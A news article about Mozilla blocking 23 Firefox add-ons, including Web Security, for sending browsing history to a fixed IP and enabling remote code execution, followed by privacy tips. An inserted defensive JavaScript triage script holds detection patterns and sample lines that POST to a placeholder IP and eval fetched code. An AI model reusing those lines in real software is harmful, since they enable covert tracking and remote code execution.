Mozilla has blocked 23 extensions this week after uBlock Origin developer Raymond Hill and others started noticing discrepancies in a browser security add-on called Web Security. The Firefox extension had over 220 000 downloads and a 4.5 out of 5 rating by the time people started questioning some of the plugin’s code.
Hill said he started noticing strange behavior in the plugin’s functionality. He posted his concerns in a Firefox thread on Reddit, where he said Web Security seems to send every page you load in your browser to a fixed IP address, which was later identified as belonging to a server in Germany. “The posted data is garbled, maybe someone will have the time to investigate further,” Hill said on Reddit. Interestingly enough, this same Reddit thread leads to a blog post on Mozilla’s website called “Make your Firefox browser a privacy superpower with these extensions”, which listed Web Security as one of the must-have Firefox privacy plugins (it has since been removed from the list).
However, it didn’t take long for others to start looking into what the extension’s code does, and some of that code appeared to be potentially malicious. Web Security, for its part, is aimed at protecting users from visiting websites that are potentially infected with malware or are known to conduct phishing scams. But it seems the extension itself was unsafe and could have exposed users to remote attacks.
After Hill’s post, a popular German blogger known as Mike Kuketz posted an article on his website that also discussed the extension. He warned his readers that it looks like Web Security might be sending sensitive information to an undisclosed server. Those who then started picking apart the code found that it was assigning each user an ID and was sending information related to each ID, including info it labeled as ‘old-URL’ and ‘new-URL,’ to the German IP address that Hill had highlighted.
Mozilla Engineers Take Action
The flurry of activity prompted Mozilla to take a look into the Web Security plugin themselves, and Mozilla engineer Rob Wu started the arduous process of finding out what this extension has been doing. But he didn’t just stop there. This sparked an investigation into all other browser extensions in the Firefox portfolio as well, and according to Wu, he found similar questionable behavioral patterns in 22 other Firefox extensions. That correlated with a user’s comment on a ghacks.net forum, which stated that Web Security, Browser-Security, and Browser Privacy all seem to do this, and, what’s more, that they all send browser history information to the same IP address.
We identified two patterns with regard to those extensions. The first pattern takes the form of data collection, which then sends your browsing history to a remote server. The second doesn’t track your browsing history excessively, but does open up some vulnerabilities in the system that could allow an attacker to send commands from a remote server through remote code execution. While speaking to Bleeping Computer, Wu said that “the sheer number of misleading identifiers, obfuscated URLs / constants, and covert data flows left me with little doubt about the intentions of the author: It is apparent that they tried to hide malicious code in their add-on.”
The company also issued a statement about the situation and said the following:
“A number of reports have come up that the Web Security add-on (https://addons.mozilla.org/addon/web-security/) is sending visited URLs to a remote server. While this may seem reasonable for an add-on that checks visited web pages for their security, other issues have been brought up:
1) The add-on sends more data than what seems necessary to operate.
2) Some of the data is sent unsafely.
4) The code has the potential of executing remote code, which is partially obfuscated in its implementation.
5) Multiple add-ons with very different features and different authors have the same code. Further inspection reveals they may all be the same person/group.”
Following the incident, Mozilla decided to remove these 23 extensions from the Firefox extension collection, and they also had their engineers disable the add-ons in users’ browsers, which means the potentially harmful code will no longer have access to users’ devices or information.
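A first-pass static check for the two patterns described above (URL reporting to a fixed IP address, and a path from network data to code execution), written as an added example; it is not code from Mozilla or from any of the blocked add-ons. The function name `triageExtension`, the pattern labels and the sample extension are assumptions constructed for illustration.

```javascript
// Static triage of an unpacked WebExtension: manifest object + {filename: source}.
const URL_VISIBILITY = ["tabs", "webNavigation", "webRequest", "history"];
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];
const IP_ENDPOINT = /https?:\/\/(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/g;
const NETWORK_SEND = /\b(XMLHttpRequest|fetch\s*\(|sendBeacon\s*\()/;
const DYNAMIC_CODE = /\beval\s*\(|new\s+Function\s*\(/;

function triageExtension(manifest, files) {
  const perms = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ];
  const seesUrls = perms.some((p) => URL_VISIBILITY.includes(p));
  const broadHosts = perms.some((p) => BROAD_HOSTS.includes(p));
  const findings = [];
  for (const [name, src] of Object.entries(files)) {
    const ips = [...src.matchAll(IP_ENDPOINT)].map((m) => m[1]);
    const sends = NETWORK_SEND.test(src);
    const dynamic = DYNAMIC_CODE.test(src);
    // Pattern 1: can observe browsing and talks to a hard-coded IP address.
    if ((seesUrls || broadHosts) && sends && ips.length > 0) {
      findings.push({ file: name, pattern: "url-reporting-to-fixed-ip", ips });
    }
    // Pattern 2: network access next to a dynamic-code sink (eval / new Function).
    if (sends && dynamic) {
      findings.push({ file: name, pattern: "remote-code-sink" });
    }
  }
  return findings;
}

// Constructed sample extension (not taken from Web Security or any real add-on).
// 203.0.113.7 is a documentation-range address used as a placeholder.
const sampleManifest = { permissions: ["tabs", "<all_urls>", "storage"] };
const sampleFiles = {
  "background.js":
    'var x = new XMLHttpRequest(); x.open("POST", "http://203.0.113.7/r");',
  "loader.js": "fetch(cfgUrl).then(r => r.text()).then(t => eval(t));",
  "ui.js": 'document.title = "ok";',
};

console.log(triageExtension(sampleManifest, sampleFiles));
```

Because the article reports obfuscated URLs and constants, a source-level scan like this can miss them; observing the add-on's network requests in a test profile covers that gap.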
Web Security Developer Responds To Concerns
It didn’t take long for representatives behind the plugin to voice their side of the story.
Fabian Simon, who is a representative of the company that owns the Web Security extension, answered the issues highlighted by Mozilla by commenting on their statement under the profile name of Lutz Falkenburg. In these comments, Fabian directly addresses the problems Mozilla listed, saying that they use the URLs they collect to check against a global blacklist and that the server needs access to a user’s recent browser history to map how a user reached a malicious site. “Thus after receiving the IP-address (obviously necessary for the communication), we immediately anonymize it or even delete it completely. We have no stake in tracking the user only the malicious sites that are visited,” Fabian went on to say.
In these comments, Fabian also mentions that the company is aware that they have made mistakes, that their code was not correctly encrypted but that it has been fixed now, and that they would like to work with Mozilla to fix any dubious code as well as to be more transparent in their communication to their users in the future.
So while the potentially harmful effects of the Web Security code might have been caught early enough to prevent any damage to users, it still serves as a big eye-opener to just how much trust we’re giving to third-party companies to protect our cybersecurity. And those companies might not always get things right.
Check Your (Cyber)self
For years people have been debating about complete online privacy and security. Some believe that taking control of your anonymity through a decentralized internet is the answer, while others simply use a VPN and believe that’s enough to keep their identities and browsing data safe. Truth be told, it’s hard to gauge how vulnerable we are. It’s also a broad topic that needs a whole discussion of its own to encompass all the details. And that means we’re only touching upon the surface of the problem right here. But if you know that you’ve been a little lax in the department of cybersecurity (as many of us have), then there are some things you can do.
While it’s nearly impossible to be completely safe, you can protect yourself by doing things like:
- Reading through privacy policies. I know almost none of us do that, but they are there for a reason. If you’re really worried about what companies are doing with your private browsing data and identity, then that’s a good place to start.
- Read up on any new programs or systems you want to use or install. People will usually let the internet know their displeasure if they find any sketchy things going on with a site or an app, and there are plenty of sites dedicated to letting you know just that.
- Don’t install or download anything if you’re not sure where it comes from. It’s interesting that this still needs to be said in 2018, but you would be surprised at how many times people don’t know whether they’re downloading from a reputable source or not.
- Don’t click on any links sent to you from an unknown source. Again, this has been said many times over, but people still fall for it.
- If you’re really keen to make sure any sensitive information you might have doesn’t fall into just anyone’s hands, then you can look into encryption. End-to-end encryption is probably the easiest go-to and is already being widely used.